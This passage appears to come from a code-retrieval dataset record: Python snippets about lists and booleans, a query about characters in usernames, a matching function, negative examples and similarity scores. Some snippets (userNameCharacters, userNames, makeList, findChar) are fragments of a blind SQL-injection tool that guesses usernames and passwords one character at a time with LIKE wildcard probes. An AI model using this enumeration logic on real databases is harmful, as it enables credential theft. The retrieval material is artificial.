lst.append(item)\n return lst", "def predicate(f):\n wrapper = Predicate(f)\n update_wrapper(wrapper, f)\n return wrapper", "def satisfiesF(L):\n # Your function implementation here\n fS = []\n newL = []\n for element in L:\n fS.append(f(element))\n\n for idx in range(len(fS)):\n if not fS[idx]:\n L[idx] = '!@#'\n\n for idx in range(len(L)):\n try:\n L.remove('!@#')\n except:\n break;\n\n return len(L)", "def make_lists(sv):\r\n \r\n mark_delayed(sv) # identify delayed objects\r\n make_pin_list(sv) # detect and initialize inputs (to false) \r\n make_old_list(sv) # create a list of used old/old \r", "def test_roundtrip_list():\n assert [True, False, True, False, True] == (\n List(Boolean).read(\n List(Boolean).to_bytes(\n [True, False, True, False, True]))\n )", "def check_for_list(check):", "def Listor(fun):\n @functools.wraps(fun)\n def inside(*args, **kwargs):\n return list(fun(*args, **kwargs))\n return inside", "def eval_f(f, xs):\n l = []\n for x in xs:\n l.append(f(x))\n return l", "def makelist(count, lista):\n if count <= 8:\n return makelist(count+1, lista+[(int(input()))])\n print(*list(filter(lambda x: x%2 == 0, lista)))", "def custom_filter(some_func, iterator_list):\n\n local_iterator = from_input_to_list(iterator_list)\n func_map = [some_func(i) for i in local_iterator]\n true_list = [j for j in func_map if j > 100] # here we can hardcode any condition\n\n return true_list", "def _maplist_vm(vm, f, xs):\n def f_(*args):\n return vm.call(f, args)\n return list(map(f_, xs))", "def generateLists(a, b, p):\n list_of_listings = []\n chk_nums = []\n for i in range(2, b-a+1):\n if prime_test(i,p):\n chk_nums.append(i)\n for i in chk_nums:\n listing = []\n for j in range(a, b+1):\n if j % i == 0:\n listing.append(j)\n list_of_listings.append(listing)\n final_list = []\n for listing in list_of_listings:\n if len(listing) > 1:\n final_list.append(listing)\n return final_list", "def lift(f):\n @wraps(f)\n def inner(value):\n result = f(value)\n return SuperBool(result, f.__doc__) if not isinstance(result, SuperBool) else result\n return inner", "def to_list(a, args):\n if args.filter(follow=a).exists():\n exists = True\n else:\n exists = False\n return exists", "def boolean_func(experiment):", "def split(func, iterable):\n falsy, truthy = [], []\n for e in iterable:\n if func(e):\n truthy.append(e)\n else:\n falsy.append(e)\n return tuple(falsy), tuple(truthy)", "def list_generalizer(f):\n @functools.wraps(f)\n def wrapped(data, *args, **kwargs):\n if type(data) == list:\n return [f(d, *args, **kwargs) for d in data]\n else:\n return f(data, *args, **kwargs)\n\n return wrapped", "def simple_map(f, l):\n # Again, my first take is a list comprehension.\n return [ f(item) for item in l ]", "def maplist(f, xs):\n return list(map(f, xs))", "def visit_list(self, list_to_visit: list, symbol_table: SymbolTable) -> Number:\n passed_cases = []\n for node in list_to_visit:\n result = self.visit(node, symbol_table)\n passed_cases.append(result)\n\n if False in [num.value == 1 for num in passed_cases]:\n return self.symbol_table[\"false\"]\n else:\n return self.symbol_table[\"true\"]", "def generate_boolean_vector(f,q,r,DIMS):\n b = None\n for i in range(DIMS):\n if b is None:\n b = (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n else :\n b = b & (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n return b", "def filter_generic(mt_list, func):\r\n return [mt for mt in mt_list if func(mt)]", "def all(self, *args, **kwargs):\n if len(args):\n func = args[0]\n args = args[1:]\n else:\n func = bool\n for x in self:\n if not func(x, *args, **kwargs):\n return plist()\n return self", "def __init__(self):\n self.b = [False] * 10", "def existing_and_newer_list(fn0_l, fn):\n\n rs = [existing_and_newer(fn0, fn) for fn0 in fn0_l]\n some_false = False in rs\n return not some_false", "def _clean_simple_type_list(value_list: list[Any]) -> list[Any]:\n for i in range(len(value_list)):\n if isinstance(value_list[i], str):\n lower_case_value = value_list[i].lower()\n if lower_case_value == \"true\":\n value_list[i] = True\n if lower_case_value == \"false\":\n value_list[i] = False\n return value_list", "def generate_list(self):\n\n array = [False] * 25\n bits = self.generate_bits()\n\n for column in range(2, -1, -1):\n for row in range(0, 5):\n bit = next(bits)\n\n array[column + (row * 5)] = bit\n array[(4 - column) + (row * 5)] = bit\n\n return array", "def boolean(\n function: Callable[..., celpy.celtypes.Value]) -> Callable[..., celpy.celtypes.BoolType]:\n @wraps(function)\n def bool_function(a: celpy.celtypes.Value, b: celpy.celtypes.Value) -> celpy.celtypes.BoolType:\n result = function(a, b)\n if result == NotImplemented:\n return cast(celpy.celtypes.BoolType, result)\n return celpy.celtypes.BoolType(bool(result))\n return bool_function", "def filterfalse(iterable, predicate):\n for x in iterable:\n if not predicate(x):\n yield x", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def prime_numbers_determination_list(n: int)-> List[bool]:\r\n is_prime = [True] * (n + 1)\r\n is_prime[0] = is_prime[1] = False\r\n\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if is_prime[i]:\r\n for j in range(i*2, n+1, i):\r\n is_prime[j] = False\r\n return is_prime", "def conj(fs):\n def feature(s, i):\n return all(f(s, i) for f in fs)\n return feature", "def _lst_of_tpls(step, parsing_function, filt=None):\n lst = []\n for key in step:\n if step[key][0]: # On/Off flag\n if len(step[key]) > 1:\n content_d = step[key][1]\n content_vals = list(values_iterator(content_d))\n for ll in modified_cartesian(*map(ensure_list, content_vals)):\n content = dict(zip(list(content_d), ll))\n if filt is not None and filt(content):\n continue\n lst.append(parsing_function(key, content))\n else:\n lst.append(parsing_function(key, {}))\n return lst", "def get_boolean_array_from(number: int) -> List[bool]:\n return_value = [False] * MAX_BIT_LENGTH\n last_bit_position = len(bin(number)) - 1\n for i in range(0, last_bit_position):\n return_value[i] = (number & (1 << i)) != 0\n return return_value", "def creates(f):\n f.creates = True\n return f", "def set_bools(self, value, bools, limit):\n for x in range(limit):\n if value & 1 << x:\n bools[x]['value'] = True\n else:\n bools[x]['value'] = False\n pass", "def gen_list_gt(lst, no):\r\n #syntax: [ item for item in lst if_condition ]\r\n return [ item for item in lst if item > no ]", "def test_listlist_op_1():\n\n @ops.listlist_op\n def f(x):\n return [4, 5, 6]\n\n result = f([1, 2, 3]) # Passing in a list, as expected\n\n assert(isinstance(result, list)), f\"{result}\"\n assert(result == [4, 5, 6])", "def sequence(f, lst: list) -> list:\n ret = []\n for ele in lst:\n ret.append(f(ele))\n return ret", "def test_if_false_elimination():\n\n class Falsy:\n def __bool__(self):\n # For Python 3\n return False\n\n false_values = [0, \"\", [], {}, set(), False, None, Falsy()]\n assert not any(false_values)\n\n def f_if():\n if x:\n print(\"x is True\")\n\n for x in false_values:\n check_component(\n prune_cfg,\n f_if,\n additional_bindings=dict(x=x),\n expected_source=\"\"\"\n def f_if():\n pass\n \"\"\",\n )\n\n def f_if_else():\n if x:\n print(\"x is True\")\n else:\n print(\"x is False\")\n\n check_component(\n prune_cfg,\n f_if_else,\n additional_bindings=dict(x=False),\n expected_source=\"\"\"\n def f_if_else():\n print(\"x is False\")\n \"\"\",\n )", "def filter(self, func: Callable[[T], bool]) -> 'List[T]':\n return [v for v in self.array if func(v)]", "def satisfiesF(L):\n # Your function implementation here\n i = 0\n while i < len(L):\n if not f(L[i]):\n L.remove(L[i])\n else:\n i += 1\n return len(L)", "def false(func):\n return MultipleChoice(_text_from_func(func), Answer('False'), Answer('True'), is_code=True)", "def every(lst, fn):\n return reduce(lambda acc, elem: acc and fn(elem), lst, True)", "def split_cond(f, iterable):\n split_point = [i for i, e in enumerate(iterable) if f(e)]\n split_point += [len(iterable)]\n return [iterable[i:j] for i, j in zip(split_point[:-1], split_point[1:])]", "def filter_(f: Callable[[A], Maybe[bool]], iterable: Iterable[A]\n ) -> Maybe[Iterable[A]]:\n return cast(Maybe[Iterable[A]], filter_m_(Just, f, iterable))", "def listify(fn=None, wrapper=list):\n\n def listify_return(fn):\n @functools.wraps(fn)\n def listify_helper(*args, **kw):\n return wrapper(fn(*args, **kw))\n\n return listify_helper\n\n if fn is None:\n return listify_return\n return listify_return(fn)", "def getBooleanArray2D(self) -> typing.List[typing.List[bool]]:\n ...", "def true_false_both_filter(request, items, parameter):\n if parameter in request['args']:\n test = request['args'][parameter].lower()\n if test == 'true':\n items = [item for item in items if item[parameter]]\n elif test == 'false':\n items = [item for item in items if not item[parameter]]\n elif test == 'both':\n # Otherwise return both true and false values\n pass\n else:\n raise UserException(ERROR_TRUE_FALSE_BOTH_REQUIRED % parameter)\n\n return items", "def piecewise(x, condlist, funclist, *args, **kw):\n x = asanyarray(x)\n n2 = len(funclist)\n if isscalar(condlist) or \\\n not (isinstance(condlist[0], list) or\n isinstance(condlist[0], ndarray)):\n condlist = [condlist]\n condlist = [asarray(c, dtype=bool) for c in condlist]\n n = len(condlist)\n if n == n2-1: # compute the \"otherwise\" condition.\n totlist = condlist[0]\n for k in range(1, n):\n totlist |= condlist[k]\n condlist.append(~totlist)\n n += 1\n if (n != n2):\n raise ValueError, \"function list and condition list \" \\\n \"must be the same\"\n\n zerod = False\n # This is a hack to work around problems with NumPy's\n # handling of 0-d arrays and boolean indexing with\n # numpy.bool_ scalars\n if x.ndim == 0:\n x = x[None]\n zerod = True\n newcondlist = []\n for k in range(n):\n if condlist[k].ndim == 0:\n condition = condlist[k][None]\n else:\n condition = condlist[k]\n newcondlist.append(condition)\n condlist = newcondlist\n\n y = zeros(x.shape, x.dtype)\n for k in range(n):\n item = funclist[k]\n if not callable(item):\n y[condlist[k]] = item\n else:\n y[condlist[k]] = item(x[condlist[k]], *args, **kw)\n return y", "def f1(a, b): \n if a == False and b == True:\n return True\n else:\n return False", "def iff(bool,trueValue,falseValue):\n if bool:\n return trueValue\n else:\n return falseValue", "def get_list_bool_from_string(input_string):\n for text in [\"[\", \"]\", \" \"]:\n input_string = input_string.replace(text,\"\")\n list_of_strings = input_string.strip().split(\",\")\n list_bool = [True if item==\"True\" else False for item in list_of_strings]\n return list_bool", "def __init__(self):\n self.li=[[False *100000] for i in range(100000)]", "def partition(is_included_fn, items):\n item_by_exclusion = { True : [], False : [] }\n for item in items:\n # \"not\" to normalise all values to either True or False\n item_by_exclusion[not is_included_fn(item)].append(item)\n return (item_by_exclusion[False], item_by_exclusion[True])", "def convertToFloatArray(booleanArray: typing.List[bool]) -> typing.List[float]:\n ...", "def createFlagList(self):\n flag_list = QListWidget()\n for key in self.flags.keys():\n flag_item = QListWidgetItem()\n flag_item.setText(key)\n flag_item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)\n flag_item.setCheckState(Qt.Unchecked)\n flag_list.addItem(flag_item)\n\n flag_list.itemClicked.connect(self.flagEnable)\n return flag_list", "def filter(self, ffun):\n # BEGIN\n lst = []\n for item in WordSet(self.text).words():\n # if len(item) == len(ffun):\n # lst.append(item)\n if ffun(item) == True:\n lst.append(item)\n return lst\n\n # END", "def make_boolean(value):\n if value == '1':\n return True\n return False", "def test_if_true():\n\n true_values = [True, 1, 2.0, object(), \"foo\", int]\n assert all(true_values)\n\n def f_if():\n if x:\n print(\"x is True\")\n\n for x in true_values:\n check_component(\n prune_cfg,\n f_if,\n additional_bindings=dict(x=x),\n expected_source=\"\"\"\n def f_if():\n print('x is True')\n \"\"\",\n )\n\n def f_if_else():\n if x:\n print(\"x is True\")\n else:\n print(\"x is False\")\n\n check_component(\n prune_cfg,\n f_if_else,\n additional_bindings=dict(x=2),\n expected_source=\"\"\"\n def f_if_else():\n print(\"x is True\")\n \"\"\",\n )", "def true(func):\n return MultipleChoice(_text_from_func(func), Answer('True'), Answer('False'), is_code=True)", "def visit_true(self) -> T:", "def post_processing(f,param_dict):\r\n must_have = param_dict['must_have']\r\n cannot_be_together = param_dict['cannot_be_together']\r\n\r\n # must have \r\n tmp = list()\r\n for itemset in f:\r\n if set(itemset).intersection(set(must_have)): \r\n tmp.append(itemset)\r\n\r\n f = tmp[:]\r\n\r\n # cannot be together\r\n for itemset in f:\r\n for cbt in cannot_be_together:\r\n if set(cbt) <= set(itemset):\r\n tmp.remove(itemset)\r\n \r\n return tmp", "def listFlag(flaglist):\n flag = 0\n for index, item in enumerate(flaglist):\n flag = setFlag(flag, index, item)\n return flag", "def convert_falselike_to_bool(input_item, convert_int=False, convert_float=False):\n list_False_items = [False, \"False\", \"false\", \"FALSE\", \"F\", \"f\", \"falsch\", \"FALSCH\", \"valse\", \"lažna\", \"fals\",\n \"NEPRAVDA\", \"falsk\", \"vals\", \"faux\", \"pa vre\", \"tsis tseeb\", \"hamis\", \"palsu\", \"uongo\", \"ngeb\",\n \"viltus\", \"klaidinga\", \"falz\", \"falso\", \"USANN\", \"wartosc false\", \"falošné\", \"falskt\", \"yanlis\",\n \"sai\", \"ffug\", \"VALSE\", \"LAŽNA\", \"FALS\", \"FALSK\", \"VALS\", \"FAUX\", \"PA VRE\", \"TSIS TSEEB\",\n \"HAMIS\", \"PALSU\", \"UONGO\", \"NGEB\", \"VILTUS\", \"KLAIDINGA\", \"FALZ\", \"FALSO\", \"WARTOSC FALSE\",\n \"FALOŠNÉ\", \"FALSKT\", \"YANLIS\", \"SAI\", \"FFUG\"]\n\n # if you want to accept 0 or 0.0 as a false value, add it to the list\n if convert_int:\n list_False_items += [0, \"0\"]\n if convert_float:\n list_False_items += [0.0, \"0.0\"]\n # return boolean False if the input item is in the list. If not, return the original input_item\n return_value = False if input_item in list_False_items else input_item\n\n return return_value", "def enf_filelist(filelist, extension = None):\n\n new_filelist = None\n\n if isinstance(filelist, str):\n if os.path.isdir(filelist):\n new_filelist = list_files(False, filelist, False, False)\n\n elif os.path.isfile(filelist):\n new_filelist = [filelist]\n\n elif isinstance(filelist, bool):\n print 'Expected file list or directory but received boolean or None type input!'\n return False\n elif isinstance(filelist, list):\n new_filelist = filelist\n\n\n if new_filelist is None:\n new_filelist = filelist\n\n if extension is not None:\n\n for new_file in new_filelist:\n\n if extension not in new_file:\n new_filelist.remove(new_file)\n\n return new_filelist", "def _BoolsToInts(arg_list):\n result = []\n for arg in arg_list:\n if isinstance(arg, (list, tuple)):\n result.append(_BoolsToInts(arg))\n elif arg is True:\n result.append(1)\n elif arg is False:\n result.append(0)\n else:\n result.append(arg)\n\n return result", "def visit_false(self) -> T:", "def map(self, f):\n if self.is_empty():\n pass\n else:\n items = []\n items.append(f(self._first))\n map(f._rest)\n new_lst = LinkedListRec(items)", "def make_list(self, a, b, LIMIT):\n\t\tprint \"I just made a list\"\n\t\tlist_a_b = []\n\t\tfor i in range(a,b + 1):\n\t\t\tif (i % 2 != 0 and i < LIMIT):\n\t\t\t\tlist_a_b.append(i)\n\t\treturn list_a_b", "def none(self, *args, **kwargs):\n if len(args):\n func = args[0]\n args = args[1:]\n else:\n func = bool\n for x in self:\n if func(x, *args, **kwargs):\n return plist()\n return self", "def any(self, *args, **kwargs):\n if len(args):\n func = args[0]\n args = args[1:]\n else:\n func = bool\n for x in self:\n if func(x, *args, **kwargs):\n return self\n return plist()", "def convertToStringArray(booleanArray: typing.List[bool]) -> typing.List[str]:\n ...", "def TransformFlags(self) -> _n_2_t_0[bool]:", "def generate_train(n: int, case: Case) -> List[bool]:\n if case is Case.Random:\n return [bool(randint(0, 1)) for _ in range(n)]\n elif case is Case.AllOn:\n return [True for _ in range(n)]\n elif case is Case.AllOffButStart:\n return [True] + [False for _ in range(n - 1)]", "def simple_map_2(f, l):\n # Same as above without comprehension:\n mapped_l = []\n for item in l:\n mapped_l.append( f(item) ) # the extra blanks are just for readability\n return mapped_l", "def custom_filter(function, iterable):\n map_list = []\n\n for i in iterable:\n if function(i):\n map_list.append(i)\n\n return map_list", "def _make_zero(p):\n\n return [pi == 0 for pi in p]", "def truth_values(formula: Formula, models: Iterable[Model]) -> Iterable[bool]:\n # Task 2.3\n arr = []\n for model in models:\n arr.append(evaluate(formula, model))\n return arr", "def map(self, f: Callable[[Any], Any]) -> RecursiveList:\n # If empty, return empty list\n if self.is_empty():\n return RecursiveList([])\n else:\n # Apply f to the first element and make a new list to return\n rl = RecursiveList([f(self._first)])\n # Map the rest of the list and set it to rl's _rest\n rl._rest = self._rest.map(f) # recursive call\n return rl", "def subset(mylist,mybool):\n myarray = np.array(mylist)\n return(np.squeeze(myarray.take(np.where(mybool),axis=0)))", "def condition_for_function(f, abi, all_not_in_ABI):\n\n\tcondition = []\n\tfor n in f.entry_points:\n\t\t[category, num] = api.get_category_for_name( n )\n\t\tif category not in abi:\n\t\t\tcondition.append( 'defined(need_%s)' % (gl_XML.real_category_name( category )) )\n\t\telif all_not_in_ABI:\n\t\t\treturn []\n\n\treturn condition", "def unbool(element, true=object(), false=object()):\r\n\r\n if element is True:\r\n return true\r\n elif element is False:\r\n return false\r\n return element" ]
[ "0.63551515", "0.63446385", "0.6126535", "0.5955366", "0.5880952", "0.5871879", "0.58662516", "0.5822809", "0.57801163", "0.5777717", "0.5704812", "0.56913203", "0.55946165", "0.55707604", "0.55597055", "0.5552575", "0.55456346", "0.55446935", "0.5511639", "0.54347694", "0.54155916", "0.5350729", "0.5329134", "0.5305977", "0.52911603", "0.5270238", "0.525476", "0.5248569", "0.52472484", "0.52467495", "0.52444065", "0.5191356", "0.5190649", "0.5158934", "0.5153904", "0.51525056", "0.5151617", "0.5131768", "0.5116737", "0.51079845", "0.50913465", "0.5070372", "0.5066828", "0.50612557", "0.5040858", "0.5038232", "0.5037023", "0.50333303", "0.5027547", "0.50234747", "0.50230527", "0.4982338", "0.49817693", "0.49744558", "0.49736163", "0.49582025", "0.4957356", "0.49549353", "0.49372736", "0.49304834", "0.49270585", "0.49266693", "0.49183035", "0.4909277", "0.4908612", "0.49008018", "0.48877928", "0.4887385", "0.4881374", "0.4880783", "0.48771778", "0.48736235", "0.48641562", "0.48527446", "0.4851805", "0.4847717", "0.48449853", "0.48448285", "0.48426542", "0.48344308", "0.48339203", "0.48337957", "0.4831885", "0.48195833", "0.47981602", "0.4796928", "0.47963744", "0.47817478", "0.47678012", "0.47665483", "0.47645396", "0.47592098", "0.47475472", "0.4744578", "0.47420242", "0.473606", "0.47270757", "0.47267133", "0.47180665", "0.4716183" ]
0.56456155
12
returns list of characters that appear in any username
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True): """ sqlzoo characters ['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%'] """ lst = [] for ch in special: if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")): lst.append(ch) for ch in lower: if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")): lst.append(ch) for ch in numbers: if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")): lst.append(ch) for ch in other: if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")): lst.append(ch) if(caseSensitive): for ch in upper: if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")): lst.append(ch) if(wildCards): for ch in wildcards: lst.append(ch) #it'll match if there's users return lst
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def all_users():\n\treturn [unicode(name[:-4]).lower() for name in os.listdir(os.path.join(WORLD_DIR, 'players'))]", "def check_user_name(self, username):\n usernames = []\n for user in self.__users:\n if user['username'] == username:\n usernames.append(user)\n return usernames", "def check_username(username):\n if username:\n if not re.match('[a-z]', username[0]):\n return ['username_error_badfirstchar']\n # Technically both these conditions might hold. However, the common\n # case seems to be that somebody starts typing their name beginning\n # with an upper-case letter, and it's probably sufficient to just\n # issue the first error in that case.\n elif not re.match('^[-a-z0-9_]+$', username):\n return ['username_error_badchar']\n return []", "def checkUsernameSequences(n, ch, url, tableName, minLen = 1, maxLen = 2):\n if(minLen == 1):\n strLst = ch\n # assumes all of ch is a match\n else:\n strLst = []\n for k in range(minLen, maxLen + 1):\n lst = generateSubSequences(k, ch)\n sublst = [x for x in lst if userNameLike(x, url, tableName)]\n# list comprehensions with conditions:\n# https://stackoverflow.com/questions/6475314/python-for-in-loop-preceded-by-a-variable\n strLst += sublst\n return strLst", "def containing(letter, text):\n return([word for word in text if word.count(letter) >= 1])", "def clean_user_input(self, user_input):\n legal_chars = re.compile(r'^[a-z0-9]$')\n return filter(lambda c: re.match(legal_chars, c), user_input.lower())", "def find_single_letters(question):\n if re.findall(r\"\\bletter\\b|\\bletters\\b\", question):\n matches = re.findall(r\"\\b[A-Za-z]\\b\", question)\n\n return [m for m in matches]\n\n return []", "def filt(seq, lst):\n regex = \"(\" + \")|(\".join(seq) + \")\"\n regex = re.compile(regex)\n slst = list(filter(regex.search, lst))\n return slst\n\n\n # still need a checkUsername function ", "def chars(self, irc, msg, args, channel, username):\n if not self.registryValue('full_access', channel):\n irc.reply('Concord denies you access on this channel!')\n return\n\n user = self._sql(\"\"\"\n SELECT * FROM accounting_capsuler\n WHERE username=%s\"\"\", [username])\n if not user:\n irc.error('Could not find user \"{0}\"'.format(username))\n return\n\n chars = self._sql(\"\"\"\n SELECT * FROM character_charactersheet\n WHERE owner_id=%s\"\"\", [user['id']], single=False)\n\n if len(chars) == 0:\n irc.reply('User \"{0}\" has 0 characters registered'.format(user['username']),\n prefixNick=False)\n else:\n output = []\n for char in chars:\n output.append('{0} [{1}]'.format(\n char['name'],\n char['corporationName']\n ))\n irc.reply('Found {0} characters: {1}'.format(\n len(chars),\n \", \".join(output)\n ), prefixNick=False)", "def get_blocked_usernames_list():\n return []", "def makeList(username, url, caseSensitive = False, wildCards = True):\n charList = []\n for ch in lower:\n # check for ch in \n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in numbers:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in special:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in other:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(caseSensitive):\n for ch in upper:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(wildCards):\n for ch in wildcards:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n return charList", "def get_pure_user_words(user_words: List[str], letters: List[str], words_from_dict: List[str]) -> List[str]:\r\n unknown_words = []\r\n for wordd in user_words:\r\n if wordd not in words_from_dict:\r\n unknown_words.append(wordd)\r\n forbidden_letters = [i for i in string.ascii_lowercase]\r\n for i in letters:\r\n try:\r\n forbidden_letters.remove(i)\r\n except:\r\n pass\r\n word_list = []\r\n letstr = \"\"\r\n for i in letters:\r\n letstr += i\r\n for word in unknown_words:\r\n if len(word) >= 4 and len(word) <= 9:\r\n count = 0\r\n for let in word:\r\n if let in forbidden_letters:\r\n count += 1\r\n if word.count(let) > letstr.count(let):\r\n count += 1\r\n if letters[4] not in word:\r\n count += 1\r\n if count == 0:\r\n word_list.append(word)\r\n return word_list", "def invalid_username(username):\n word_letters = re.sub('[^a-zA-Z-0-9]+', '', str(username))\n if any(item.isalpha() for item in word_letters):\n return False\n return True", "def having_letters(self):\r\n self.letter=[chr(c) for c in range(97, 123)]\r\n self.owning_letters=list()\r\n i=0\r\n while i<7:\r\n temp=random.choice(self.letter)\r\n if temp not in self.owning_letters:\r\n self.owning_letters.append(temp)\r\n i+=1\r\n else:\r\n continue\r\n return self.owning_letters", "def get_unique_characters(text):\n return sorted(list(set(text)))", "def search_for_letters(phrase:str, letters:str='aeiou') -> set:\n return set(letters).intersection(set(phrase))", "def _get_unique_chars(self, data_string):\n unique_chars = list(set(data_string))\n return unique_chars", "def listusers():\n allusers = []\n with open('/etc/passwd', 'r') as pw:\n for l in pw.readlines():\n allusers.append(l.split(':')[0])\n users = [ d for d in os.listdir(\"/home\") if d in allusers ]\n return(users)", "def remaining():\n return([letter for letter in alphabet if letter not in [char for char in list(decoded_dict.values()) if char.isupper() == True]])", "def example_usernames():\n return [\"A\", \"B\", \"C\"]", "def other_chars(self):\n return [sign for sign in re.findall(r'[^\\w\\s]', self.text)]", "def remaining_en():\n return([letter for letter in alphabet if decoded_dict[letter].upper() == letter])", "def other_chars(self):\n return re.findall(r'[,.!?_\\':;/#%*\\=@\"]', self.text)", "def _get_consonants(sequence: str) -> list:\n consonants = []\n for char in sequence:\n if char in CONSONANTS:\n consonants.append(char)\n return consonants", "def username_validation(username):\n errors = []\n #Check if Username exists\n if(username_present(username)):\n errors.append(\"Användarnamnet finns redan.\")\n #Username needs to be longer then 3 chars\n if(len(username) <= 3):\n errors.append(\"Användarnamnet mäste vara 3 tecken eller längre.\")\n\n return errors", "def check(self, text):\n p = self.d\n i = 0\n j = 0\n result = []\n ln = len(text)\n while i + j < ln:\n t = text[i + j].lower()\n # print i,j,hex(ord(t))\n if not (t in p):\n j = 0\n i += 1\n p = self.d\n continue\n p = p[t]\n j += 1\n # print p,i,j\n if chr(11) in p:\n p = self.d\n result.append(text[i:i + j])\n i = i + j\n j = 0\n return result", "def normalize_username(username):\n\n regex = compile(UnicodeUsernameValidator.regex)\n normalized_username = \"\"\n for char in username:\n if not regex.match(char):\n continue\n normalized_username += char\n return normalized_username", "def _clean_term(self, term):\n return filter(lambda char: char in allowed_chars, term)", "def userNames(lst, url, tableName):\n n = len(lst)\n # https://docs.python.org/3/library/itertools.html#itertools.product\n # https://stackoverflow.com/questions/3034014/how-to-apply-itertools-product-to-elements-of-a-list-of-lists\n lst2 = list(itertools.product(*lst))\n lst3 = list(map(\"\".join, lst2))\n #\n # Maybe use checkUsernameSequences here,\n # then add a check to reduce the amount of possibilities before building lst?\n #\n\n seq = checkUsernameSequences(n, lst, url, tableName, minLen = 2, maxLen = 2)\n # does not include the single characters since minLen > 1\n\n lst4 = filt(seq, lst3)\n \"\"\"# next time:\n find matching strings. That should (hopefully) reduce the space to search. \n REMEMBER, this filtering will miss all single character usernames!!!\n\n https://docs.python.org/3/library/re.html#regular-expression-syntax\n https://stackoverflow.com/questions/3640359/regular-expressions-search-in-list\n https://stackoverflow.com/questions/3040716/python-elegant-way-to-check-if-at-least-one-regex-in-list-matches-a-string\n https://stackoverflow.com/questions/19300020/python-match-a-string-with-regex\n https://stackoverflow.com/questions/37974047/if-any-strings-in-a-list-match-regex\n\"\"\"\n\n lst5 = [x for x in lst4 if checkUsername(x, url, tableName)]\n # lst = list(map(checkUsername, lst2))\n return lst5", "def get_usernames(self, selector: Optional[Callable[[User], bool]]=None) -> Set[str]:\n return set([u.name for u in self.iter_users(selector)])", "def letters_in(string):\n string = remove_accents(string.lower())\n return sorted(\n char\n for char in string\n if char.isalpha()\n )", "def stringContainsAllCharacters(string, characters):\n assert type(string) is str\n assert iter(characters)\n return False not in [character in string for character in characters]", "def get_pure_user_words(user_words, letters, words_from_dict):\n checked_user_words = []\n for each_user_word in user_words:\n if 4 <= len(each_user_word) <= 9:\n if letters[4] in each_user_word:\n count = 0\n for each_user_let in each_user_word:\n if each_user_let in letters:\n count += 1\n if count == len(each_user_word):\n checked_user_words.append(each_user_word)\n for each_word in checked_user_words:\n count_let = 0\n if each_word in words_from_dict:\n checked_user_words.remove(each_word)\n for each_word in checked_user_words:\n coun_me = 0\n for each_let in each_word:\n if each_word.count(each_let) <= letters.count(each_word):\n count_me += 1\n if count_me == len(each_word):\n checked_user_words.remove(each_word)\n return (checked_user_words)", "def search4letters(phrase:str, letters:str='aeyuio') -> set:\n letters_to_be_checked = set(letters)\n return letters_to_be_checked.intersection(set(phrase))", "def blank():\n return([word for word in decoded_words if sum([1 for char in word if char.isupper()==False]) == 1])", "def search4letters(phrase: str, letters: str = 'aeiou') -> set:\n return set(letters).intersection(set(phrase))", "def search4letters(phrase:str, letters:str) -> set:\n return set(letters).intersection(set(phrase))", "def get_user_words() -> List[str]:\r\n user_words = input()\r\n user_words = user_words.split()\r\n return user_words", "def findChar(username, url, charList, i):\n for ch in charList:\n if(checkPasswordCharacter(ch, username, url, index = i)):\n return ch\n #only runs if no ch in charList match:\n # return i #oof, there's no match if i is out of bounds, e.g. len(password) < i\n print(\"Missing: \" + i) #so I know when it's not a match\n return \"\" #return an empty string instead\n # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). \n # If wildCards is false, this will just skip characters that don't match anything!", "def tokens(text):\n t = re.sub(\"[A-Z]\", lambda x: \"_\" + x.group(0).lower(), text)\n return set(re.findall('[a-z]+', t))", "def findall(string,chars):\n nb = len(chars) \n return [ pos for pos, c in enumerate(string)\n if pos + nb <= len(string) and string[pos:pos + nb] == chars]", "def verificacionUser(nom_usuario):\n \"\"\"La cuenta de usuario solo puede contener:\n - caracteres alfanumericos\n - '-', '_' o '.' \"\"\"\n nom_usuario = str(nom_usuario)\n nom_usuario = nom_usuario.strip()\n nom_usuario = nom_usuario.lower()\n car_validos = 'abcdefghijklmnopqrstuvwxyz0123456789-_.'\n\n for indice in nom_usuario:\n if(car_validos.find(indice) == -1):\n print('Su nombre de usuario contiene un caracter no valido:',\n \"'\", indice, \"'\")\n return False\n return True", "def is_isogram(word):\n word = [char.lower() for char in word if char.isalpha()]\n for char in word:\n if word.count(char) > 1:\n return False\n return True", "def get_usernames(self) -> list:\n db_list = list(self.cursor.execute('SELECT * FROM sqlite_master'))\n users = [db_list[i][1] for i in range(0, len(db_list), 2)]\n return users", "def filter_users_by_username():\n username = request.args.get('username').strip().lower()\n users = User.query.all()\n users = [user for user in users if username in user.username.lower()]\n return jsonify([user.json() for user in users])", "def find_symbols(text):\n\n words = text.split()\n symbols = []\n\n for word in words:\n # remove leading or trailing punctuation marks\n word = word.translate(str.maketrans(\"\", \"\", punctuation))\n\n if (\n word.isalpha()\n and (word not in symbols)\n and (len(word) <= 5)\n and (word not in BLACKLIST)\n and word.isupper()\n ):\n symbols.append(word)\n\n return symbols", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars(\"aa\"))\n 